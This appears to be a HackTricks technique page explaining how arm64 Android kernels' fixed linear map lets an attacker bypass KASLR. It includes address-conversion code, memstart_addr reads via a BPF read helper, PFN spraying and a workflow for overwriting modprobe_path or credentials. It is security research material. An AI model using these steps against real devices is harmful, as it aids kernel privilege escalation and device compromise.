Linux arm64 Static Linear Map KASLR Bypass

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Overview

Android kernels built for arm64 almost universally enable CONFIG_ARM64_VA_BITS=39 (3-level paging) and CONFIG_MEMORY_HOTPLUG=y. With only 512 GiB of kernel virtual space available, the Linux developers chose to anchor the linear map at the lowest possible kernel VA so that future hot-plugged RAM can simply extend the mapping upward. Since commit 1db780bafa4c, arm64 no longer even attempts to randomize that placement, which means:

  • PAGE_OFFSET = 0xffffff8000000000 is compiled in.
  • PHYS_OFFSET is sourced from the exported memstart_addr, which on stock Android devices is effectively constant (0x80000000 today).

As a consequence, every physical page has a deterministic linear-map virtual address that is independent of the KASLR slide:

#define phys_to_virt(p) (((unsigned long)(p) - 0x80000000UL) | 0xffffff8000000000UL)

If an attacker can learn or influence a physical address (kernel object, PFN from /proc/pagemap, or even a user-controlled page), they instantly know the corresponding kernel virtual address without leaking the randomized primary kernel mapping.

Reading memstart_addr and confirming the transform

memstart_addr is exported in /proc/kallsyms and can be read on rooted devices or via any arbitrary kernel-read primitive. Project Zero used Jann Horn’s tracing-BPF helper (bpf_arb_read) to dump it directly:

grep memstart /proc/kallsyms
# ... obtains memstart_addr virtual address
./bpf_arb_read <addr_of_memstart_addr> 8

The bytes 00 00 00 80 00 00 00 00 confirm memstart_addr = 0x80000000. Once PAGE_OFFSET and PHYS_OFFSET are pinned, the arm64 linear map is a static affine transform of any physical address.

Deriving stable .data addresses on devices with a fixed kernel physbase

Many Pixels still decompress the kernel at phys_kernel_base = 0x80010000 on every boot (visible in /proc/iomem). Combining that with the static transform yields cross-reboot-stable addresses for any data symbol:

  1. Record the randomized kernel virtual address of _stext and of your target symbol from /proc/kallsyms (or from the exact vmlinux).
  2. Compute the offset: offset = sym_virt - _stext_virt.
  3. Add the static boot-time physbase: phys_sym = 0x80010000 + offset.
  4. Convert to a linear-map VA: virt_sym = phys_to_virt(phys_sym).

Example (modprobe_path on a Pixel 9): offset = 0x1fe2398, phys = 0x81ff2398, virt = 0xffffff8001ff2398. After multiple reboots, bpf_arb_read 0xffffff8001ff2398 returns the same bytes, so exploit payloads can treat 0xffffff8000010000 as a synthetic, non-randomized base for all .data offsets.

This mapping is RW, so any primitive that can place attacker data in kernel virtual space (double free, UAF, non-paged heap write, etc.) can patch credentials, LSM hooks, or dispatch tables without ever leaking the true KASLR slide. The only limitation is that .text is mapped non-executable in the linear map, so gadget hunting still requires a traditional leak.

PFN spraying when the kernel physbase is randomized

Vendors such as Samsung randomize the kernel load PFN, but the static linear map is still abusable because PFN allocation is not fully random:

  1. Spray user pages: mmap() ~5 GiB, touch every page to fault it in.
  2. Harvest PFNs: read /proc/pagemap for each page (or use another PFN leak) to collect the backing PFN list.
  3. Repeat and profile: reboot, rerun 100×, build a histogram showing how often each PFN was attacker-controlled. Some PFNs are white-hot (allocated 100/100 times shortly after boot).
  4. Convert PFN → kernel VA:
    • phys = (pfn << PAGE_SHIFT) + offset_in_page
    • virt = phys_to_virt(phys)
  5. Forge kernel objects in those pages and steer victim pointers (UAF, overflow, etc.) to the known linear-map addresses.

Because the linear map is identity-mapped RW memory, this technique lets you place fully attacker-controlled data at deterministic kernel VAs even when the real kernel base moves. Exploits can prebuild fake file_operations, cred, or refcount structures inside the sprayed pages and then pivot existing kernel pointers into them.

Practical workflow for arm64 Android exploits

  1. Info gathering
    • Root or use a kernel read primitive to dump memstart_addr, _stext, and the target symbol from /proc/kallsyms.
    • On Pixels, trust the static physbase from /proc/iomem; on other devices, prepare the PFN profiler.
  2. Address calculation
    • Apply the offset math above and cache the resulting linear-map VAs in your exploit.
    • For PFN spraying, keep a list of “reliable” PFNs that repeatedly land in attacker memory.
  3. Exploit integration
    • When an arbitrary write is available, directly patch targets such as modprobe_path, init_cred, or security ops arrays at the precomputed addresses.
    • When only a heap corruption exists, craft fake objects in the known-supervised pages and repoint victim pointers to those linear-map VAs.
  4. Verification
    • Use bpf_arb_read or any safe read primitive to sanity-check that the computed address contains the expected bytes before destructive writes.

This workflow eliminates the KASLR-leak stage for data-centric kernel exploits on Android, which drastically lowers exploit complexity and improves reliability.

References

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks